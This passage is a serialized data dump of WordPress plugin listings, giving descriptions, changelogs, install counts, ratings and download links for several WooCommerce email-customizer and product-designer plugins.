Settings\u003C\u002Fstrong>\u003Cbr \u002F>\nGave the option a particular name called “Template Setting”\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Relocated the **Border Color\u003C\u002Fstrong> option in Template Settings**\u003Cbr \u002F>\nNow, the Border Color option would appear after the \u003Cstrong>Border Right Width\u003C\u002Fstrong> option and above the \u003Cstrong>Border Radius\u003C\u002Fstrong> option to define the border widths properly.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Rename and Capitalization of Options For Template Settings\u003C\u002Fstrong>\u003Cbr \u002F>\nSome option names, such as ‘bottom padding’, ‘Custom css’, and ‘box shadow’, have been capitalized for better readability.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Rename and Capitalization of Options for Email Header\u003C\u002Fstrong>\u003Cbr \u002F>\nSpelling Corrections, Capitalization, and the Renaming of options in the Email Header tab.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Rename and Capitalization of Options in Email Body\u003C\u002Fstrong>\u003Cbr \u002F>\nSpelling Corrections, Capitalization, and the Renaming of options in the Email Body tab.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Slider Issue In Footer Text Padding Top And Footer Text Padding Bottom Options\u003C\u002Fstrong>\u003Cbr \u002F>\nAdded a textbox to manually adjust the slider in the ‘Footer Text Padding Top’ and ‘Footer Text Padding Bottom’ options in the Footer tab.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Rename and Capitalization of Options in Footer\u003C\u002Fstrong>\u003Cbr \u002F>\nSpelling corrections, capitalization, and the renaming of options in the \u003Cstrong>Footer\u003C\u002Fstrong> tab.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Rename and Capitalization of Options in Subtitle Styles (WooCommerce)\u003C\u002Fstrong>\u003Cbr \u002F>\nSpelling Corrections, capitalization, and the renaming of options in the \u003Cstrong>Subtitle Styles (WooCommerce)\u003C\u002Fstrong> tab.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Dropdown Menu was not appearing correctly\u003C\u002Fstrong>\u003Cbr \u002F>\nThe dropdown menu was appearing incorrectly, and the first option should be selected by default since it works like that in the previous options. Now it has been fixed.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Order Table Styles option | No reflection in real-time\u003C\u002Fstrong>\u003Cbr \u002F>\nPreviously, this option was not reflecting any change when any sub-option was selected from the dropdown menu. It has been fixed now.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Product Image & Product Image Size options | No reflection in real-time\u003C\u002Fstrong>\u003Cbr \u002F>\nBoth options (Product Image & Product Image Size) were not reflecting any change when any sub-option was selected from the dropdown menu. It has been fixed now.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Order Table Border Color option | No reflection in real-time\u003C\u002Fstrong>\u003Cbr \u002F>\nPreviously, this option was not reflecting any change in real time. Now it has been fixed.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Order Table Heading Style option | No reflection on real-time\u003C\u002Fstrong>\u003Cbr \u002F>\nPreviously, this option was not reflecting any change in real time. Now it has been fixed.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Slider issue in Footer Text Padding Top\u002FBottom, Left\u002FRight, and Border Width options\u003C\u002Fstrong>\u003Cbr \u002F>\nThe numbers were not appearing on the slider in the \u003Cstrong>Padding Top\u002FBottom\u003C\u002Fstrong> and \u003Cstrong>Padding Left\u002FRight\u003C\u002Fstrong> options in the \u003Cstrong>Footer\u003C\u002Fstrong> tab. Now it has been fixed by implementing a text box so the admin can manually enter the numbers.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Enable order notes to be moved bellow option | Spelling mistake and No reflection on real-time | Order Items Styles (WooCommerce)\u003C\u002Fstrong>\u003Cbr \u002F>\nSpelling correction was made, and real-time reflection was fixed.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Rename the “Clear” button to “Default” in color grid options – Order Items Styles (WooCommerce)\u003C\u002Fstrong>\u003Cbr \u002F>\nThe color grid option had the option name “Clear” which has been replaced by “Default” for better user understanding.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Rename and Capitalization of Options in Order Items Styles (WooCommerce)\u003C\u002Fstrong>\u003Cbr \u002F>\nSpelling mistakes and capitalization of words were corrected in various places.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Button Font Size option Slider issue in Button Style (WooCommerce)\u003C\u002Fstrong>\u003Cbr \u002F>\nThe numbers were not appearing on the slider in the \u003Cstrong>Button Font Size\u003C\u002Fstrong> option in the Footer tab. Now it has been fixed by implementing a text box to enable the admin to enter numbers manually.\u003C\u002Fp>\n","Design and send custom emails with Email Templates plugin for WordPress and WooCommerce",591858,92,133,"2026-03-26T12:41:00.000Z","4.8","7.1",[158,159,160,144,161],"email","email-customizer","email-designer","woocommerce-email","http:\u002F\u002Fwordpress.org\u002Fplugins\u002Femail-templates","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Femail-templates.1.5.11.zip",99,2,"2023-11-03 00:00:00",{"slug":168,"name":169,"version":170,"author":171,"author_profile":172,"description":173,"short_description":174,"active_installs":175,"downloaded":176,"rating":177,"num_ratings":178,"last_updated":179,"tested_up_to":130,"requires_at_least":180,"requires_php":18,"tags":181,"homepage":185,"download_link":186,"security_score":127,"vuln_count":165,"unpatched_count":141,"last_vuln_date":187,"fetched_at":142},"email-customizer-for-woocommerce","Email Customizer for WooCommerce | Drag and Drop Email Templates Builder","2.6.9","ThemeHigh","https:\u002F\u002Fprofiles.wordpress.org\u002Fthemehigh\u002F","\u003Cp>The WooCommerce Email Customizer plugin lets you customize your transactional emails with an intuitive template builder. The plugin allows you to add different elements in the template like text, image, divider, and a lot more. It makes your template precise and easy to understand with a layout that matches your brand style.\u003C\u002Fp>\n\u003Cp>\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002F4pr829T0MXg?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\u003C\u002Fp>\n\u003Ch4>☞ Default Templates\u003C\u002Fh4>\n\u003Cp>The plugin comes with \u003Cstrong>11 WooCommerce default email templates\u003C\u002Fstrong> for various status, which you can customize from scratch to align with your brand.\u003C\u002Fp>\n\u003Ch4>☞ Drag & Drop\u003C\u002Fh4>\n\u003Cp>Quick and easy! Start creating your email templates using the simple drag and drop email template builder.\u003C\u002Fp>\n\u003Ch4>☞ User-Friendly Builder\u003C\u002Fh4>\n\u003Cp>This easy-to-build email template builder provides the best user experience by helping users customize & manage the WooCommerce templates effortlessly.\u003C\u002Fp>\n\u003Ch4>☞ Unlimited Rows\u003C\u002Fh4>\n\u003Cp>With the WooCommerce Email customizer plugin, you can add an unlimited number of rows and include the appropriate elements for your email templates.\u003C\u002Fp>\n\u003Ch4>☞ Real-Time Preview\u003C\u002Fh4>\n\u003Cp>The plugin lets you see the real-time changes made during the template edit.\u003C\u002Fp>\n\u003Ch4>☞ Live Preview\u003C\u002Fh4>\n\u003Cp>The plugin’s preview option displays a live preview of the created email template, and it often helps you know how the template looks.\u003C\u002Fp>\n\u003Ch4>☞ Add Multiple Elements\u003C\u002Fh4>\n\u003Cp>The WooCommerce Email Customizer plugin lets you add different elements to your email template, namely basic elements & WooCommerce elements.\u003C\u002Fp>\n\u003Ch4>☞ Dynamic Placeholders\u003C\u002Fh4>\n\u003Cp>Includes the option to add dynamic placeholders like customer name, site name, user name, and much more. With dummy placeholders, the template designing becomes easier and keeps the messages personalized.\u003C\u002Fp>\n\u003Cp>Available placeholders are;\u003C\u002Fp>\n\u003Cul>\n\u003Cli>customer_name\u003C\u002Fli>\n\u003Cli>site_name\u003C\u002Fli>\n\u003Cli>account_area_url\u003C\u002Fli>\n\u003Cli>user_login\u003C\u002Fli>\n\u003Cli>user_pass\u003C\u002Fli>\n\u003Cli>set_password_url\u003C\u002Fli>\n\u003Cli>reset_password_url\u003C\u002Fli>\n\u003Cli>customer_note\u003C\u002Fli>\n\u003Cli>customer_full_name\u003C\u002Fli>\n\u003Cli>order_id\u003C\u002Fli>\n\u003Cli>order_created_date\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>☞ Test Emails\u003C\u002Fh4>\n\u003Cp>The test email feature of the plugin helps you to understand the appearance of the email template created.\u003C\u002Fp>\n\u003Ch4>☞ Compatibility\u003C\u002Fh4>\n\u003Cp>The WooCommerce Email Customizer plugin is compatible with most of the WooCommerce plugins like \u003Ca href=\"https:\u002F\u002Fwww.themehigh.com\u002Fproduct\u002Fwoocommerce-checkout-field-editor-pro\u002F?utm_source=wec_free&utm_medium=readme&utm_campaign=wcfe_upgrade_link\" rel=\"nofollow ugc\">Checkout Field editor for WooCommerce\u003C\u002Fa>, \u003Ca href=\"https:\u002F\u002Fwww.themehigh.com\u002Fproduct\u002Fwoocommerce-extra-product-options\u002F?utm_source=wec_free&utm_medium=readme&utm_campaign=wepo_upgrade_link\" rel=\"nofollow ugc\">Extra Product Options for WooCommerce\u003C\u002Fa>, etc.\u003C\u002Fp>\n\u003Ch4>☞ Email Elements\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\n\u003Cp>\u003Cstrong>Text:\u003C\u002Fstrong> Add text content to your email template and customize the font details, border properties, margin size, and so on.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Cstrong>Image:\u003C\u002Fstrong> Add images to your email template and edit them based on your needs.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Cstrong>Divider:\u003C\u002Fstrong> Include a single line divider in the template and select an apt style for it. Edit the style, width, height, alignment, and much more of the divider.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Cstrong>Gap:\u003C\u002Fstrong> Add a gap between other elements and define its height, border details, and background color.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Cstrong>Social:\u003C\u002Fstrong> Add up to 11 social accounts in the email template by adding URLs of the respective accounts. Choose a preferred style from a set of 5 social icon styling options available.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Cstrong>Button:\u003C\u002Fstrong> Create user interactivity on your emails by adding buttons. Customize the button properties like button content, font family, border details, padding, and much more.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Cstrong>Gif:\u003C\u002Fstrong> Make your email alive by adding a gif element to the template. You can edit the related details of the gif from its properties.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>☞ WooCommerce Elements\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\n\u003Cp>\u003Cstrong>Header:\u003C\u002Fstrong> The header element lets you add a header section to your email template. Edit the header details from the header properties.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Cstrong>Customer Details:\u003C\u002Fstrong> The customer element adds the customer details in the email template. You can edit all the properties of the element like text size, color, alignment, padding, background, and a lot more.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Cstrong>Order:\u003C\u002Fstrong> The Order element lets you insert the order details in the email template. You can customize the order table details from the properties of the element. Also, you can change the labels of the order table.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Cstrong>Billing Details:\u003C\u002Fstrong> Display the billing details in your email template by separately customizing the heading and details part. You can edit the text color, size, border details, etc of the billing details.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Cstrong>Shipping Details:\u003C\u002Fstrong> Display the shipping details in your email template by customizing their properties like size, color, alignment, and a lot more.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Cstrong>Downloadable Product:\u003C\u002Fstrong> The plugin lets you show the downloadable product data in your email template.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>☞ WooCommerce Hooks\u003C\u002Fh4>\n\u003Cp>Add the hooks provided by WooCommerce like email header, order details, order table, order meta, customer details, etc. You can add the required hooks to your email template based on your needs.\u003C\u002Fp>\n\u003Ch4>☞ Email Mapping\u003C\u002Fh4>\n\u003Cp>This section allows you to set emails for each order’s status. There are in total 12 email conditions available here.\u003C\u002Fp>\n\u003Cp>Join \u003Ca href=\"https:\u002F\u002Fwww.facebook.com\u002Fgroups\u002Fthemehigh\u002F\" rel=\"nofollow ugc\">Themehigh Community\u003C\u002Fa> to get help from similar people\u003C\u002Fp>\n\u003Ch3>💎💎 Premium Features\u003C\u002Fh3>\n\u003Cp>The premium version of the \u003Ca href=\"https:\u002F\u002Fwww.themehigh.com\u002Fproduct\u002Fwoocommerce-email-customizer\u002F?utm_source=wec_free&utm_medium=readme&utm_campaign=wec_upgrade_link\" rel=\"nofollow ugc\">Email Customizer for WooCommerce\u003C\u002Fa> plugin comes with a wide number of features and several customization options. It includes features like \u003Cstrong>configuring background and border properties, WPML compatibility, adding custom hooks, and so on\u003C\u002Fstrong>.\u003C\u002Fp>\n\u003Cp>You can check out the demo for a more detailed overview of the features. \u003Ca href=\"https:\u002F\u002Fflydemos.com\u002Fwecm\u002F?utm_source=wec_free&utm_medium=readme&utm_campaign=wec_try_demo\" rel=\"nofollow ugc\">Demo – Email Template Builder\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch4>☞ More Columns\u003C\u002Fh4>\n\u003Cp>The pro version of the Email customizer plugin lets you add multiple column layouts. Also, you can increase the number of columns based on your preference.\u003C\u002Fp>\n\u003Ch4>☞ Custom Hooks\u003C\u002Fh4>\n\u003Cp>Using this option, the users can display the shortcode from third-party plugins and add dynamic content to your email template.\u003C\u002Fp>\n\u003Ch4>☞ More Customization Options\u003C\u002Fh4>\n\u003Cp>Customize the background image properties, border details, and padding details for each element of your email template.\u003C\u002Fp>\n\u003Ch4>☞ WPML Compatibility\u003C\u002Fh4>\n\u003Cp>With the WPML compatibility feature, you can design email templates in multiple languages.\u003C\u002Fp>\n\u003Ch4>☞ Import & Export\u003C\u002Fh4>\n\u003Cp>The Email customizer plugin lets you export the created email templates from your store to another site. While exporting, you can copy the mapping (to which email status is the template assigned) and the subject of the respective email template. These settings can be quickly imported to your site.\u003C\u002Fp>\n\u003Ch4>☞ Compatibility\u003C\u002Fh4>\n\u003Cp>The Email customizer for the WooCommerce plugin is compatible with YITH WooCommerce Gift Cards and Woocommerce Order Status Manager plugin.\u003C\u002Fp>\n\u003Ch4>☞ Additional Placeholders\u003C\u002Fh4>\n\u003Cp>The premium version of the plugin includes more placeholders like order-related, billing-related, and shipping-related placeholders.\u003C\u002Fp>\n\u003Cp>\u003Cem>Make more customisations to your WooCommerce transactional mails by upgrading to the Premium version. For the complete list of features, Please visit \u003Ca href=\"https:\u002F\u002Fwww.themehigh.com\u002Fproduct\u002Fwoocommerce-email-customizer\u002F?utm_source=wec_free&utm_medium=readme&utm_campaign=wec_upgrade_link\" rel=\"nofollow ugc\">Email Customizer for WooCommerce\u003C\u002Fa> plugin’s official page.\u003C\u002Fem>\u003C\u002Fp>\n\u003Cp>Check how it works (Live Demo): 🔗 \u003Ca href=\"https:\u002F\u002Fflydemos.com\u002Fwecm\u002Fwp-admin\u002F?utm_source=wec_free&utm_medium=readme&utm_campaign=try_demo\" rel=\"nofollow ugc\">Email Template Builder\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>Why ThemeHigh\u003C\u002Fh3>\n\u003Cp>Our plugins are genuinely made after abundant research to improve the woocommerce experience of our customers. We strive every minute to provide complete support to implement your dreamstore.\u003C\u002Fp>\n\u003Cp>🏆 2 Million+ Customers\u003Cbr \u002F>\n🏆 Quickest Turn-around Support\u003Cbr \u002F>\n🏆 Most Lightweight Plugins\u003C\u002Fp>\n\u003Cp>\u003Cstrong>See a few reviews below;\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cblockquote>\n\u003Cp>mengelman (@mengelman) ⭐⭐⭐⭐⭐\u003Cbr \u002F>\n Easy to use plugin and their support is extremely vigilant with finding solutions to your issues.\u003C\u002Fp>\n\u003Cp>asperagrafica (@asperagrafica) ⭐⭐⭐⭐⭐\u003Cbr \u002F>\n Title says it all. It’s a good plugin. It does what it’s been advertised as with the occasional confusion how some things work. But you know what? A plugin with THIS friendly and fast support is always worth 5 starts, because nothing can be overcome. I do appreciate that.\u003C\u002Fp>\n\u003Cp>adwitprasan240 (@adwitprasan240) ⭐⭐⭐⭐⭐\u003Cbr \u002F>\n It is a great Plugin and I am easily able to change the layout.It’s all i wanted.The support team is very quick to respond and knowledgeable.It is the one of the best plugin i have used.\u003C\u002Fp>\n\u003C\u002Fblockquote>\n\u003Cp>For more info on ThemeHigh and Email Customizer for WooCommerce plugin in specific, check out the following:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>The \u003Ca href=\"https:\u002F\u002Fwww.themehigh.com\u002Fproduct\u002Fwoocommerce-email-customizer\u002F?utm_source=wec_free&utm_medium=readme&utm_campaign=wec_upgrade_link\" rel=\"nofollow ugc\">Email Customizer for WooCommerce\u003C\u002Fa> premium plugin homepage.\u003C\u002Fli>\n\u003Cli>The \u003Ca href=\"https:\u002F\u002Fwww.themehigh.com\u002Fdoc\u002Fwoocommerce-email-customizer\u002F?utm_source=wec_free&utm_medium=readme&utm_campaign=help_docs\" rel=\"nofollow ugc\">Knowledgebase\u003C\u002Fa>.\u003C\u002Fli>\n\u003Cli>Other \u003Ca href=\"https:\u002F\u002Fwww.themehigh.com\u002Fplugins\u002F?utm_source=wec_free&utm_medium=readme&utm_campaign=themehigh_plugins\" rel=\"nofollow ugc\">WordPress Plugins\u003C\u002Fa> by the ThemeHigh team.\u003C\u002Fli>\n\u003Cli>Follow ThemeHigh on \u003Ca href=\"https:\u002F\u002Fwww.facebook.com\u002FThemeHigh-319611541768603\u002F?utm_source=wordpress&utm_medium=referral&utm_content=tracking\" rel=\"nofollow ugc\">Facebook\u003C\u002Fa>, \u003Ca href=\"https:\u002F\u002Fwww.linkedin.com\u002Fcompany\u002Fthemehigh\u002F?utm_source=wordpress&utm_medium=referral&utm_content=tracking\" rel=\"nofollow ugc\">LinkedIn\u003C\u002Fa>, \u003Ca href=\"https:\u002F\u002Ftwitter.com\u002Fthemehigh\u002F?utm_source=wordpress&utm_medium=referral&utm_content=tracking\" rel=\"nofollow ugc\">Twitter\u003C\u002Fa> & \u003Ca href=\"https:\u002F\u002Fwww.youtube.com\u002Fchannel\u002FUC-_uMXaC_21j1Y2_nGjTyvg\u002F?utm_source=wordpress&utm_medium=referral&utm_content=tracking\" rel=\"nofollow ugc\">YouTube\u003C\u002Fa>.\u003C\u002Fli>\n\u003C\u002Ful>\n","WooCommerce Email Customizer plugin lets you customize transactional emails using a template builder, adding text, images & more to match your brand",10000,252869,86,43,"2026-03-10T09:26:00.000Z","4.9",[159,160,182,183,184],"email-template","woocommerce-email-customizer","woocommerce-emails","https:\u002F\u002Fwww.themehigh.com\u002Fproduct\u002Fwoocommerce-email-customizer","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Femail-customizer-for-woocommerce.2.6.9.zip","2026-01-06 20:40:18",{"slug":189,"name":190,"version":191,"author":192,"author_profile":193,"description":194,"short_description":195,"active_installs":196,"downloaded":197,"rating":198,"num_ratings":199,"last_updated":200,"tested_up_to":130,"requires_at_least":201,"requires_php":132,"tags":202,"homepage":206,"download_link":207,"security_score":208,"vuln_count":14,"unpatched_count":141,"last_vuln_date":209,"fetched_at":142},"product-designer","PickPlugins Product Designer for WooCommerce","1.0.40","PickPlugins","https:\u002F\u002Fprofiles.wordpress.org\u002Fpickplugins\u002F","\u003Cp>Product Designer plugin is a ready and simple way to add WooCommerce product customize or product designer on your eCommerce shop. Allow your customer to design or customize themselves before submitting order. you customer can add custom clipart, text, shapes and etc. You can add unlimited product sides for different kinds of products. our product designer is based on templates so you can use same template for many products. Users can download or preview their designs before submitting orders. there is a ton of options for customizing text art, clipart and shapes.\u003C\u002Fp>\n\u003Ch3>Product Designer by http:\u002F\u002Fpickplugins.com\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwww.pickplugins.com\u002Fitem\u002Fproduct-designer\u002F?ref=wordpress.org\" rel=\"nofollow ugc\">See Premium »\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwww.pickplugins.com\u002Fdemo\u002Fproduct-designer\u002F?ref=wordpress.org\" rel=\"nofollow ugc\">Live Demo »\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwww.pickplugins.com\u002Fdocumentation\u002Fproduct-designer\u002Ffaq\u002Fdisplay-product-designer\u002F?ref=wordpress.org\" rel=\"nofollow ugc\">Documentation »\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwww.pickplugins.com\u002Fsupport\u002F?ref=wordpress.org\" rel=\"nofollow ugc\">Support »\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Plugin Features\u003C\u002Fp>\n\u003Cp>\u003Cstrong>WooCommerce ready\u003C\u002Fstrong>\u003Cbr \u002F>\nProduct Designer is WooCommerce ready and your customer will able to submit order by customizing products, you will able to see design files via order data.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Clipt Arts\u003C\u002Fstrong>\u003Cbr \u002F>\nYou can add unlimited clipart, image, picture for design assest, so your user can add them to designer. there is category based filter and ajax pagination for accessing cliparts.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Text Arts\u003C\u002Fstrong>\u003Cbr \u002F>\nYour customer can add text on the product designer, there is many option to customize text, font size, color, font families, we added 50+ hand picked Google fonts, you can add your own.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>SVG or Shapes\u003C\u002Fstrong>\u003Cbr \u002F>\nYou can upload or add unlimited shapes or svg file and your customer can use these to design their products.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Unlimited product sides\u003C\u002Fstrong>\u003Cbr \u002F>\nBased on different product you can add any number of product sides, so user can customize each side on the designer.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Design preview\u003C\u002Fstrong>\u003Cbr \u002F>\nUser can preview their design before submit order.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Design download\u003C\u002Fstrong>\u003Cbr \u002F>\nYour customer can download design before submit order.\u003C\u002Fp>\n\u003Cp>Premium Features\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Pre saved templates\u003C\u002Fstrong>\u003Cbr \u002F>\nYou can save unlimited pre saved templates for each templates, so use can choose from pre saved template to get quickly order their expected design or start work from existing templates.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Upload custom cliparts\u003C\u002Fstrong>\u003Cbr \u002F>\nAllow users to upload their own clipart so that users can design their products as they want.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Cliparts price\u003C\u002Fstrong>\u003Cbr \u002F>\nYou can set custom price for each cliparts and different types of assets like text, qr code, barcode and text also.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Curve text\u003C\u002Fstrong>\u003Cbr \u002F>\nDisplaying curve text on the product is fancy and our product designer allow users to editing curve text.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Quotes text\u003C\u002Fstrong>\u003Cbr \u002F>\nYou can add your own quotes text, so user can use these quotes on their products.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>QR code\u003C\u002Fstrong>\u003Cbr \u002F>\nAllow user to add their QR code on the design.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Barcode\u003C\u002Fstrong>\u003Cbr \u002F>\nUser can generate their own Barcode on the design.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Download preview\u003C\u002Fstrong>\u003Cbr \u002F>\nAllow user to download preview on editing their design.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Google fonts\u003C\u002Fstrong>\u003Cbr \u002F>\nWe have already added 50+ handpicked Google fonts, you can add your own Google font via settings.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Custom fonts\u003C\u002Fstrong>\u003Cbr \u002F>\nYou can add your own custom fonts on the designer.\u003C\u002Fp>\n\u003Cp>Video tutorials\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwww.youtube.com\u002Fwatch?v=DNG07bincDk\" rel=\"nofollow ugc\">How to Install?\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwww.youtube.com\u002Fwatch?v=T_ppBuGcxnQ\" rel=\"nofollow ugc\">How to Configure?\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwww.youtube.com\u002Fwatch?v=qK2MyS10uFI\" rel=\"nofollow ugc\">Tour Guide\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwww.youtube.com\u002Fwatch?v=U7_UDxjo6bk\" rel=\"nofollow ugc\">How to add Cliparts, QR code, Barcode on design?\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwww.youtube.com\u002Fwatch?v=c_bOmHD8--w\" rel=\"nofollow ugc\">How to add Text & Curve Text on Design?\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n","Ready product designer plugin for WooCommerce",600,69483,64,12,"2026-01-19T02:46:00.000Z","3.8",[203,204,189,205],"custom-product","product-customizer","woocommerce-product-designer","https:\u002F\u002Fwww.pickplugins.com\u002Fitem\u002Fproduct-designer\u002F?ref=dashboard","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fproduct-designer.zip",95,"2024-11-20 13:35:38",{"slug":211,"name":212,"version":213,"author":214,"author_profile":215,"description":216,"short_description":217,"active_installs":218,"downloaded":219,"rating":140,"num_ratings":14,"last_updated":220,"tested_up_to":130,"requires_at_least":221,"requires_php":222,"tags":223,"homepage":226,"download_link":227,"security_score":140,"vuln_count":141,"unpatched_count":141,"last_vuln_date":35,"fetched_at":142},"custom-product-builder-for-woocommerce","Custom Product Builder for WooCommerce – Product Designer and Customizer","1.1.1","CoderPress","https:\u002F\u002Fprofiles.wordpress.org\u002Fcoderpress\u002F","\u003Cp>\u003Ca href=\"https:\u002F\u002Fcoderpress.co\u002Fproducts\u002Fcustom-product-builder-for-woocommerce\u002F?utm_source=readme&utm_medium=top&utm_campaign=cpbwc\" rel=\"nofollow ugc\">Get Pro\u003C\u002Fa> | \u003Ca href=\"https:\u002F\u002Fcpbw.coderpress.co\u002Fshop\u002F\" rel=\"nofollow ugc\">Live Demo\u003C\u002Fa> | \u003Ca href=\"https:\u002F\u002Fcoderpress.co\u002Fdocs\u002Fcustom-product-builder-for-woocommerce\u002F?utm_source=readme&utm_medium=top&utm_campaign=cpbwc\" rel=\"nofollow ugc\">Documentation\u003C\u002Fa> | \u003Ca href=\"https:\u002F\u002Fcoderpress.co\u002Fforums\u002Fforum\u002Fcustom-product-builder-for-woocommerce\u002F?utm_source=readme&utm_medium=top&utm_campaign=cpbwc\" rel=\"nofollow ugc\">Support\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002FNjRQYTEa2gE?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Trusted by 200+ WooCommerce Store Owners\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>Custom Product Builder for WooCommerce is the most user-friendly product designer plugin that transforms your store into a personalization powerhouse. Whether you sell custom t-shirts, personalized mugs, phone cases, jewelry, or print-on-demand merchandise, this drag and drop product customizer makes it easy for customers to design and order exactly what they want.\u003C\u002Fp>\n\u003Cp>Looking for a simpler, more affordable alternative to Fancy Product Designer or Lumise? Custom Product Builder offers an intuitive visual product configurator without the complexity or high price tag.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>What You Can Design With This Plugin:\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Custom T-Shirts, Hoodies & Apparel – Let customers create personalized clothing designs\u003C\u002Fli>\n\u003Cli>Personalized Mugs, Cups & Drinkware – Perfect for gift shops and promotional merchandise\u003C\u002Fli>\n\u003Cli>Phone Cases & Accessories – Offer custom mobile cover designs\u003C\u002Fli>\n\u003Cli>Jewelry & Personalized Gifts – Ideal for monogram and custom gift builders\u003C\u002Fli>\n\u003Cli>Caps, Hats & Headwear – Design custom merchandise with logos and text\u003C\u002Fli>\n\u003Cli>Print-on-Demand Products – Compatible with POD business models\u003C\u002Fli>\n\u003Cli>Corporate Gifts & Promotional Items – Serve B2B customization needs\u003C\u002Fli>\n\u003Cli>Wedding Favors & Event Merchandise – Personalization for special occasions\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Free Version Features:\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Cstrong>Drag and Drop Designer\u003C\u002Fstrong> – Intuitive visual product configurator for easy 